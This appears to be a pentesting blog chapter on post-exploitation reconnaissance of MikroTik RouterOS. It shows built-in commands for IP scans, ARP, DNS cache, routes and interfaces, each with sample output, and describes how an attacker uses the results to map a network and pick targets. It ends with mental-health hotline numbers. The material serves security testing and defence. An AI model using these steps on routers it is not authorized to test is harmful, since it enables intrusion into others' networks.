RouterOS Post-Exploitation

In this chapter, I will demonstrate several tactics for post-exploitation of RouterOS.

Scans on Hardware: IP Scan

IP Scan is a built-in tool in RouterOS that allows you to scan address ranges to locate active devices on your network. It returns data such as IP addresses, MAC addresses, and NetBIOS names, making it useful for both administrators and attackers in the post-exploitation phase.

An attacker can use IP Scan to gather information about connected devices on the network. Here's how it can be applied:

  1. Mapping the network: IP Scan allows an attacker to quickly gain insight into the network topology and understand which devices are active in a range of IP addresses. This is especially useful for launching attacks after gaining initial access to a RouterOS device. By knowing the IP and MAC addresses, an attacker can better plan further actions, such as attacking devices or attempting to pivot through other systems;
  2. Hostnames: NetBIOS names can help an attacker identify devices such as workstations or servers, giving insight into which systems may be of higher value for subsequent attacks. Using data obtained through IP Scan, an attacker can attempt to identify device types (e.g., routers, servers, or IoT devices) by characteristic MAC addresses or NetBIOS names. This makes it easier to prepare targeted attacks against specific devices.

To use IP Scan in RouterOS, an attacker can perform a scan using the following command:

/tool/ip-scan interface=home address-range=192.168.0.0/24
  • interface=home - indicates on which interface the scan will be performed;
  • address-range=192.168.0.0/24 - indicates that the address range 192.168.0.0/24 will be scanned.

Result:

Columns: ADDRESS, MAC-ADDRESS, TIME, SNMP
ADDRESS MAC-ADDRESS TIME SNMP   
192.168.0.51 B0:DC:EF:29:E2:71 1ms          
192.168.0.56 72:56:2E:32:CB:89 83ms         
192.168.0.254 0ms Survive.

IP Scan remains a powerful tool for an attacker who already has access to RouterOS. As a post-exploitation tool, it allows the attacker to:

  • Detect active devices: By obtaining IP addresses, MAC addresses, and NetBIOS names, an attacker can map the network and understand what devices are functioning on it;
  • Analyze Connected Devices: This information can be used to track device types, their purpose, and the possibility of further attacks, such as on workstations or servers;
  • Gather data for pivoting: Knowing information about network nodes, an attacker can look for opportunities to further propagate through the network by launching attacks against other devices.

ARP Table

The ARP Table (Address Resolution Protocol Table) is a table in RouterOS that maps the correspondence between IP addresses and MAC addresses on a network. In a post-exploitation context, an attacker can use this table to:

  1. Determine active hosts: The ARP table gives up-to-date information about which devices are communicating with the network;
  2. Finding interesting targets: By MAC addresses, devices such as workstations, routers or servers can be identified and selected for further exploitation.

Using ARP Table for attack:

An attacker can use the /ip arp print command in RouterOS to output the current ARP entries:

/ip arp print
Columns: ADDRESS, MAC-ADDRESS, INTERFACE
ADDRESS MAC-ADDRESS INTERFACE  
192.168.0.1 00:0C:29:E8:94:13 ether1     
192.168.0.101 50:46:5D:F0:9B:1C ether1     
192.168.0.102 00:0C:29:76:52:AD ether2     

By knowing the IP and MAC addresses of devices on the network, an attacker can use this information to launch subsequent attacks against specific targets, such as servers or workstations.

DNS Cache

The DNS Cache in RouterOS is a repository of information about domain names and their corresponding IP addresses that have been recently queried by the device. In a post-exploitation context, an attacker can use the DNS Cache to:

  1. Gathering domain information: This allows an attacker to learn which domain names were recently resolved and thus identify services or sites used on the network.
  2. Finding internal services: Requests for internal network resources can be found in the cache, allowing an attacker to learn more about the network infrastructure.

An attacker can view cached records using the command:

/ip/dns/cache/print
Columns: NAME, ADDRESS, TTL
NAME ADDRESS TTL
google.com 142.250.74.110 1h
internal-service.local 10.0.0.50 12h

Using DNS Cache, an attacker can:

  • Learn about internal domains or services that are not visible from the Internet;
  • Conduct targeted attacks against discovered services based on information about resolved domains.

Addressing Enumeration

Addressing Enumeration is the process of extracting information about IP addresses associated with devices on a network. In the post-exploitation context in RouterOS, an attacker can use address enumeration methods to identify active hosts, IP address ranges, network interfaces, and routing schemes.

An attacker can use the following commands to extract information:

  • IP Address Print: to display all assigned IP addresses:
/ip address print

Result:

192.168.0.10/24 192.168.0.0 ether1
  • Route Print: to view routes:
/ip route print

Result:

DST-ADDRESS GATEWAY INTERFACE
0.0.0.0/0 192.168.0.1 ether1

Usage in the attack:

  1. Identify active interfaces: By identifying active interfaces and IP addresses, an attacker can determine the most vulnerable points in the network for further attacks;
  2. Awareness of network structure: Address enumeration helps to gain information about the network architecture, identify critical network resources, and understand the network topology.

Interfaces

Network interfaces are the RouterOS device's network connections that are responsible for transmitting data in and out of the network. In the post-exploitation context, an attacker can use information about interfaces to further analyze the network topology, examine external and internal connections, and attack specific network segments.

To view information about network interfaces in RouterOS, an attacker can use the command:

/interface print

Result:

Columns: NAME, TYPE, MTU, MAC-ADDRESS
# NAME TYPE MTU MAC-ADDRESS
0 ether1 ether 1500 00:0C:42:3E:4A:1C
1 ether2 ether 1500 00:0C:42:3E:4A:1D
2 bridge1 bridge 1500 00:0C:42:3E:4A:1E

Network interface information can be useful to an attacker for:

  1. Identify internal and external network segments: By knowing which interfaces are associated with internal and external network segments, an attacker can target specific devices. For example, interfaces such as bridge may indicate LAN segments, while ether1 may represent an external interface associated with the Internet.
  2. Network Load Analysis: Using commands to analyze traffic by interface, an attacker can understand which network segments are most active and potentially contain interesting targets for attacks.

Outro

I wrote an extremely specific article about attacks on MikroTik routers. I hope this article will give something new in terms of techniques to pentesters, and security professionals will learn more about RouterOS pentesting and improve the security of their devices.

If you feel pain, open

If you are having suicidal thoughts or suffering from a mental health disorder, contact a professional immediately. Your life is in your hands, and only you can take the first step towards getting help. Do not let others stigmatize and devalue your feelings and experiences. Do not let anyone upset your inner balance - in this world, the most precious thing you have is yourself. Help is always near.
Support hotline numbers in Russia:

  • Unified psychological help hotline: 8-800-333-44-34
  • Emergency psychological help: 8-800-100-49-94
  • Hotline for teenagers: 8-800-2000-122

If you are having suicidal thoughts or struggling with mental health disorders, please reach out to a professional immediately. Your life is in your hands, not in the hands of those who stigmatize or devalue your struggles. Do not let anyone take away your inner peace - in this world, the most valuable thing you have is yourself. Help is always within reach.
Hotline numbers in the US and EU:

  • USA: National Suicide Prevention Lifeline: 1-800-273-TALK (8255) or text HELLO to 741741
  • EU: You can find local support services by country through the European Alliance Against Depression EAAD.
  • UK: Samaritans: 116 123
